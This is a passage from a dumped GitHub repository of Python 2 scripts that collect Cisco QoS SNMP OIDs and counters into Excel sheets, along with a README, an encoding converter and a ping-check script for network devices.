\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t# \tfila+=1\n\n\t\t\t# \tsheet.cell(row=fila,column=1).value=diccionarios[0][key][1]\n\t\t\t# \tqospolicycontrol+=1\n\t\t\t# \tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=4)\n\t\t\t# \tsheet.cell(row=fila,column=1).font=titlefont\n\t\t\t# \tsheet.cell(row=fila,column=1).fill=titlecolor\n\t\t\t# \tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t# \tsheet.row_dimensions[fila].height=20\n\t\t\t# \tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t# \tfila+=1\n\n\t\t\t# \tsheet.cell(row=fila,column=1).value='INTERFAZ CONTROL PLANE O VLAN - NO SE INCLUYEN OIDS'\n\t\t\t# \tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=4)\n\t\t\t# \tsheet.cell(row=fila,column=1).font=secondfont\n\t\t\t# \tsheet.cell(row=fila,column=1).fill=secondcolor\n\t\t\t# \tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t# \tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t# \tfila+=1\n\n\t\t\t#OLD STATEMENT\n\t\t\t# if diccionarios[0][key][0]==diccionarios[1][item][1] and (diccionarios[0][key][1]!='Control Plane' and 'Vlan' not in diccionarios[0][key][1]):\n\t\t\tif diccionarios[0][key][0]==diccionarios[1][item][1]:\n\n\t\t\t\tsheet.cell(row=fila,column=1).value=host+' - '+diccionarios[8]['value1'][0]\n\t\t\t\tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=3)\n\t\t\t\tsheet.cell(row=fila,column=1).font=titlefont\n\t\t\t\tsheet.cell(row=fila,column=1).fill=titlecolor\n\t\t\t\tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t\tsheet.row_dimensions[fila].height=20\n\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\tfila+=1\n\n\t\t\t\tsheet.cell(row=fila,column=1).value=diccionarios[0][key][1]\n\t\t\t\tqospolicycontrol+=1\n\t\t\t\tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=3)\n\t\t\t\tsheet.cell(row=fila,column=1).font=titlefont\n\t\t\t\tsheet.cell(row=fila,column=1).fill=titlecolor\n\t\t\t\tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t\tsheet.row_dimensions[fila].height=20\n\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# 
sheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\tfila+=1\n\n\t\t\t\tsheet.cell(row=fila,column=1).value='Class-Map'\n\t\t\t\tsheet.cell(row=fila,column=1).font=secondfont\n\t\t\t\tsheet.cell(row=fila,column=1).fill=secondcolor\n\t\t\t\tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\n\t\t\t\tsheet.cell(row=fila,column=3).value='OID'\n\t\t\t\tsheet.cell(row=fila,column=3).font=secondfont\n\t\t\t\tsheet.cell(row=fila,column=3).fill=secondcolor\n\t\t\t\tsheet.cell(row=fila,column=3).alignment=cellalignment\n\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\n\t\t\t\tsheet.cell(row=fila,column=2).value='Descripcion de OID'\n\t\t\t\tsheet.cell(row=fila,column=2).font=secondfont\n\t\t\t\tsheet.cell(row=fila,column=2).fill=secondcolor\n\t\t\t\tsheet.cell(row=fila,column=2).alignment=cellalignment\n\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\n\t\t\t\t# sheet.cell(row=fila,column=4).value='Valor Muestra de cada OID'\n\t\t\t\t# sheet.cell(row=fila,column=4).font=secondfont\n\t\t\t\t# sheet.cell(row=fila,column=4).fill=secondcolor\n\t\t\t\t# sheet.cell(row=fila,column=4).alignment=cellalignment\n\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\tfila+=1\n\n\t\t\t\t#los segundos dos ciclos y el if escriben buscan en base a la informacion de QOS e indices de interfaz\n\t\t\t\t#Imprimen lo mas relevante en el archivo de texto\n\n\n\t\t\t\tcorevar=0\n\t\t\t\tfor text in diccionarios[2]:\n\t\t\t\t\tfor more in diccionarios[3]:\n\t\t\t\t\t\tif diccionarios[1][item][0] == diccionarios[3][more][0].split('.')[0] and diccionarios[2][text][0]==diccionarios[3][more][1]:\n\t\t\t\t\t\t\tfor finalvalue in diccionarios[4]:\n\t\t\t\t\t\t\t\tif diccionarios[4][finalvalue][0]==diccionarios[3][more][0]:\n\t\t\t\t\t\t\t\t\tif diccionarios[2][text][1] in interestingclasses: \n\t\t\t\t\t\t\t\t\t\tcorevar+=1\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).value=diccionarios[2][text][1]\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.15.1.1.6.'+diccionarios[3][more][0]\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).value='Contador de Bytes PRE-Politica'\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).value=diccionarios[4][finalvalue][1]\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\t\t\t\t\t\tfila+=1\n\n\t\t\t\t\t\t\t\t\tif diccionarios[2][text][1] in interestingclasses:\n\t\t\t\t\t\t\t\t\t\tcorevar+=1\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).value=diccionarios[2][text][1]\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.15.1.1.10.'+diccionarios[3][more][0]\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).value='Contador de Bytes 
POST-Politica'\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).value=diccionarios[6][finalvalue][1]\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\t\t\t\t\t\t\t\t\tfila+=1\n\n\t\t\t\t#SEQUENCE FOR QUEUEING OIDs\n\t\t\t\t# for text in diccionarios[10]:\n\t\t\t\t# \tfor finalvalue in diccionarios[11]:\n\t\t\t\t# \t\tif diccionarios[11][finalvalue][0]==diccionarios[10][text][0] and diccionarios[10][text][0].split('.')[0]==diccionarios[1][item][0]:\n\t\t\t\t# \t\t\t# print diccionarios[10][text][3], diccionarios[12][finalvalue][0], diccionarios[12][finalvalue][1]\n\t\t\t\t# \t\t\tif diccionarios[10][text][3] in interestingclasses: \n\t\t\t\t# \t\t\t\t\tcorevar+=1\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).value=diccionarios[10][text][3]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.18.1.1.2.'+diccionarios[12][finalvalue][0]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).value='Maxima cantidad de paquetes en cola'\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).value=diccionarios[12][finalvalue][1]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\t# \t\t\tfila+=1\n\n\t\t\t\t# \t\t\t# print diccionarios[10][text][3], diccionarios[11][finalvalue][0], diccionarios[11][finalvalue][1]\n\t\t\t\t# \t\t\tif diccionarios[10][text][3] in interestingclasses: \n\t\t\t\t# \t\t\t\t\tcorevar+=1\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).value=diccionarios[10][text][3]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.18.1.1.1.'+diccionarios[11][finalvalue][0]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).value='Actual cantidad de paquetes en cola'\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).value=diccionarios[11][finalvalue][1]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\t# \t\t\tfila+=1\n\t\t\t\t# \t\t\t# print diccionarios[10][text][3], diccionarios[13][finalvalue][0], diccionarios[13][finalvalue][1]\n\t\t\t\t# \t\t\tif diccionarios[10][text][3] in interestingclasses: \n\t\t\t\t# \t\t\t\t\tcorevar+=1\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).value=diccionarios[10][text][3]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.18.1.1.5.'+diccionarios[13][finalvalue][0]\n\t\t\t\t# 
\t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).value='Cantidad de Bytes descartados por cola'\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).value=diccionarios[13][finalvalue][1]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\t# \t\t\tfila+=1\n\t\t\t\t\t\t\t# pass\n\t\t\t\t\n\t\t\t\t#WHEN INCLUDING QUEUEING OIDs corevar is checked for 32 and 34 rows are subtracted from fila to write Core-MPLS\n\t\t\t\tif corevar==14:\n\t\t\t\t\tsheet.cell(row=fila-16,column=1).value=diccionarios[0][key][1]+' - Core-MPLS'\n\t\t\t\tfor i in range (0,5):\n\t\t\t\t\tsheet.cell(row=fila+i,column=1).value=''\t\t\t\n\treturn fila\n\n#Funcion para escribir los OIDs de cada Class-map en los archivos de texto\ndef appendoids(archivo,filaultimate):\n\t#Guarda la informacion de los OID obtenidos en la variable results\n\tresults=[]\n\twith open(str(archivo), 'r') as inputfile:\n\t\tfor line in inputfile:\n\t\t\tresults.append(line.strip())\n\n\t#Genera un \"indice\" de donde se encuentra la informacion para cada tipo de OID\n\t#Resultado es una lista donde se expresa cuantas lineas hay en cada OID\n\tindexlist=[]\n\tlast=0\n\tfor i in range (0, len(results)):\n\t\tif \"#\" in results[i]:\n\t\t\tindexlist.append(i-last-3)\n\t\t\tlast=i\n\t#vacia los diccionarios de cada OID\n\thostname={}\n\tifindex={}\n\tifipindex={}\n\tifipindextemp={}\n\tifqosindex={}\n\tifdir={}\n\tpolicymaps={}\n\tclassmaps={}\n\tifclassindex={}\n\tcounterprev={}\n\tgaugeprev={}\n\tcounterpost={}\n\tgaugepost={}\n\tparentclassmaps={}\n\tobjecttype={}\n\tqueueingindex={}\n\tqueueingcurrent={}\n\tqueueingmax={}\n\tqueueingdiscards={}\n\n\n\t#Guarda en cada diccionario la informacion mas relevante de cada OID\n\t#Las keys de cada diccionario empiezan por value1 y aumentan dependiendo de la cantidad de lineas en cada OID\n\t#El ciclo depende de la dimension de cada archivo de texto\n\t#Cada \"if\" se activa con la descripcion que identifica los OID\n\tfor i in range (0,len(results)):\n\t\tif \"#Hostname\" in results[i]:\n\t\t\ttemp=[]\n\t\t\t#ciclo usa la cantidad de lineas de acuerdo a su OID\n\t\t\tfor x in range (0,indexlist[1]):\n\t\t\t\t#primer paso temp separa el string en dos usando el simbolo =\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\t#segundo paso guarda el ultimo valor del OID y el valor de la info correspondiente - se limpian los espacios y simbolos extras\n\t\t\t\t\t#en caso de problemas de output imprimir temp antes del if para ver su formato\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\thostname[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice de las interfaces\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[2]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tifindex[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice de IPs e interfaces\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[3]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) 
>=3:\n\t\t\t\t\ttemp=[\".\".join(temp[0].split(\".\")[-4:]),temp[2].strip().strip('\"')]\n\t\t\t\t\tifipindextemp[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice de Calidad de Servicio aplicado a cada interfaz\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[4]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tifqosindex[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Direccion en la cual se esta aplicando la politica\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[5]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tifdir[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Policy maps configurados en el equipo\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[6]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tpolicymaps[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Class maps configurados en el equipo\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[7]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tclassmaps[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice Parent Classes\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[8]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tparentclassmaps[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice usando Class-maps e Interfaces\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[9]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tifclassindex[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Valores del Contador 64 bits - Previo a ejecutar Politicas\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[10]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tcounterprev[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Valores del Gauge32 - Previo a ejecutar Politicas\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[11]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tgaugeprev[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Valores del Contador 64 bits - Despues a ejecutar Politicas\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[12]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tcounterpost[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Valores del Gauge32 - Despues a ejecutar Politicas\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[13]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) 
>=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tgaugepost[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Object Type\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[14]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tobjecttype[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Queueing current depth\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[15]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tqueueingcurrent[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Queueing max depth\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[16]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tqueueingmax[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Queueing discards\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[17]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tqueueingdiscards[\"value{0}\".format(x+1)]=temp\n\n\n\t#Getting only the loopback\n\tfor key in ifindex:\n\t\tif ifindex[key][1]=='Loopback0':\n\t\t\tfor ip in ifipindextemp:\n\t\t\t\tif ifindex[key][0]==ifipindextemp[ip][1]:\n\t\t\t\t\tifipindex={'value1':[ifipindextemp[ip][0],ifindex[key][0]]}\n\n\n\t#Ciclos para obtener un indice que incluya informacion relevante de las colas \n\t#Como viene presentado en los OID originales no se tiene suficiente infomacion para relacionar los class-maps con cada cola\n\tr=1\n\tfor key in objecttype:\n\t\tfor testvar in parentclassmaps:\n\t\t\tif \tobjecttype[key][0]==parentclassmaps[testvar][0] and objecttype[key][1]=='queueing':\n\t\t\t\tfor index in ifclassindex:\n\t\t\t\t\tif objecttype[key][0]==ifclassindex[index][0]:\n\t\t\t\t\t\tqueueingindex[\"value{0}\".format(r)]=[objecttype[key][0], ifclassindex[index][1], objecttype[key][0].split('.')[0]+'.'+parentclassmaps[testvar][1]]\n\t\t\t\t\t\tr+=1\n\n\tfor key in ifclassindex:\n\t\tfor testvar in classmaps:\n\t\t\tif classmaps[testvar][0]==ifclassindex[key][1]:\n\t\t\t\tfor more in queueingindex:\n\t\t\t\t\tif queueingindex[more][2]==ifclassindex[key][0]:\n\t\t\t\t\t\tqueueingindex[more].append(classmaps[testvar][1])\n\n\n\tdicts=[ifindex,ifqosindex,classmaps,ifclassindex,counterprev,gaugeprev,counterpost,gaugepost,ifipindex,policymaps,queueingindex,queueingcurrent,queueingmax,queueingdiscards]\n\n\n\tfilaultimate = writeexcel(dicts,filaultimate,hostname['value1'][1])+4\n\treturn filaultimate\n\n\n#lista los archivos de texto en el directorio y pasa cada uno por la funcion para aplicar \nprint 'Starting...'\nprint\nwb=openpyxl.load_workbook(\"OID_Guatemala.xlsx\")\nsheet=wb.get_sheet_by_name(\"Sheet1\")\nrow=1\npolicyclass=[]\nclasspolicy=[]\nfor filename in sorted(glob.glob('*.txt')):\n\tprint filename\n\trow=appendoids(filename,row)\nprint\nprint 'Writing to Excel File'\nwb.save('OID_Guatemala.xlsx')\n\n"
},
{
"alpha_fraction": 0.7916910648345947,
"alphanum_fraction": 0.7969573140144348,
"avg_line_length": 93.94444274902344,
"blob_id": "1ce42d265bf427e2998d41843f6744c8b5c7be9f",
"content_id": "c24fcd2daa4972094992f092b3602908ec5f78b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1709,
"license_type": "no_license",
"max_line_length": 208,
"num_lines": 18,
"path": "/README.md",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "# Proyecto-OIDs\nScripts for obtaining QOS OIDs on Cisco interfaces.\nThe proyect is a convoluted mess that probably only works in my environment. \nIt was also my first time coding in Python after learning the basics.\n\nThe Process:\n\n1. In a linux machine open the excel QOS_Guatemala.xlsx and populate it with the data of the devices you want to pull information.\n The information needed includes hostname, device IP, IP of SNMP server and the snmp community.\n2. Run the python script PWSGuatemala.py to create a text file with the Powershell lines necesary to pull the devices snmp information required.\n3. Transfer the Powershell SNMP Script Guatemala.txt to a windows server with the permissions requirements to access the SNMP info of the devices. A coding change in the text file will probably be necessary.\n4. Copy the lines of the file from the last point into a Powershell window, this will create a file for each of the devices that were polled.\n5. Because of coding differeces between windows and linux, copy all the files generated in the last point into the directory \"/Excels/Cambio de coding\"\n6. Run the script touft8.py. This script will automatically change the unicode of the files and move them to the /Excels directory.\n7. Run the OIDExcelGuatemala.py script. This will populate the OID_Guatemala.xlsx file with the QOS OIDs for every interface of the routers involved.\n8. This last task is very specific for my requirement at the moment. Run the script Format_OIDExcelGuatemala.py.\n It goes through every interface polled and accoding to certain parameters labels them as an MPLS interface. \n Those interfaces are copied the the last excel file OID-Guatemala_Core-MPLS.xlsx\n"
},
{
"alpha_fraction": 0.726190447807312,
"alphanum_fraction": 0.7351190447807312,
"avg_line_length": 27.08333396911621,
"blob_id": "0ccd39bef55847bb467bab9e667843fbf3dcd498",
"content_id": "6b5001dc4b51aaabce584b606298fafd13092aba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 336,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 12,
"path": "/Excels/Cambio de coding/toutf8.py",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "import glob\nimport os\n\n# for filename in sorted(glob.glob('*.txt')):\n\nfor filename in sorted(glob.glob('*.txt')):\n\tsourceEncoding='utf-16'\n\ttargetEncoding='utf-8'\n\tsource = open(filename)\n\ttarget = open('/home/ileam/SNMPClaro/Guatemala/Excels/'+filename,'w')\n\n\ttarget.write(unicode(source.read(), sourceEncoding).encode(targetEncoding))"
},
{
"alpha_fraction": 0.5686591267585754,
"alphanum_fraction": 0.591276228427887,
"avg_line_length": 30,
"blob_id": "39102f737b6019bed28b870e2ff574923e2d50e7",
"content_id": "1cbdb6428472ce2c951b98c3a1712d9cad3b3bd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/Prueba Ping Equipos Guatemala.py",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\nimport os\nimport stat\nimport openpyxl\nimport subprocess\n\nwb=openpyxl.load_workbook(\"QOS_Guatemala.xlsx\")\nsheet=wb.get_sheet_by_name(\"Sheet1\")\n\nwith open(os.devnull, \"wb\") as limbo:\n\tfor row in range (115,128):\n\t\tip=str(sheet[\"E\"+str(row)].value)\n\t\tprint ip, row\n\t\tresult=subprocess.Popen([\"ping\",\"-i\",\"0.5\",\"-c\", \"3\", \"-n\", \"-W\", \"2\", ip],\n stdout=limbo, stderr=limbo).wait()\n if result:\n \tsheet.cell(row=row,column=6).value=\"Unreachable\"\n else:\n \tsheet.cell(row=row,column=6).value=\"Active\"\nwb.save('QOS_Guatemala.xlsx')"
},
{
"alpha_fraction": 0.7025994062423706,
"alphanum_fraction": 0.7270641922950745,
"avg_line_length": 36.721153259277344,
"blob_id": "fb183442dd52d67814277d119b4a9211092b5865",
"content_id": "52a051256da3a10730016c4a4ab86b4c300ff149",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3924,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 104,
"path": "/Excels/Format_OIDExcelGuatemala.py",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
